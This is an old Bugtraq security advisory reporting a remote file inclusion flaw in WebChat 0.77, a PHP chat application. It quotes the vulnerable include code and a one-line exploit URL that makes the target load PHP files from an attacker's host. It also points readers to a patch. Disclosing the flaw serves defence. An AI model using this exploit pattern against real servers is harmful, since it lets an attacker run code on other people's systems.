[29115] in bugtraq
WebChat (PHP)
daemon@ATHENA.MIT.EDU (Frog Man)
Mon Mar 3 11:11:59 2003
From: "Frog Man" <leseulfrog@hotmail.com>
To: bugtraq@securityfocus.com
Date: Mon, 03 Mar 2003 13:57:43 +0100
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1; format=flowed
Message-ID: <F33JEyTeTaj1qNIFR2e000195ec@hotmail.com>
Informations :
°°°°°°°°°°°°°°
Version : 0.77
Website : http://www.webdev.ro
Problem : File Including
PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
defines.php :
-----------------------------------------------
<?
if (!isset($WEBCHATPATH)) {
$WEBCHATPATH = './';
}
include ($WEBCHATPATH.'db_mysql.php');
include ($WEBCHATPATH.'language/english.php');
[...]
-----------------------------------------------
Exploits :
°°°°°°°°°°
http://[target]/defines.php?WEBCHATPATH=http://[attacker]/
with :
http://[attacker]/db_mysql.php and
http://[attacker]/language/english.php
Patch :
°°°°°°°
A patch can be found on http://www.phpsecure.info (-> New Version !! :))
More Details :
°°°°°°°°°°°°°°
In French :
http://www.frog-man.org/tutos/WebChat.txt
frog-m@n
_________________________________________________________________
MSN Messenger : discutez en direct avec vos amis !
http://messenger.fr.msn.be
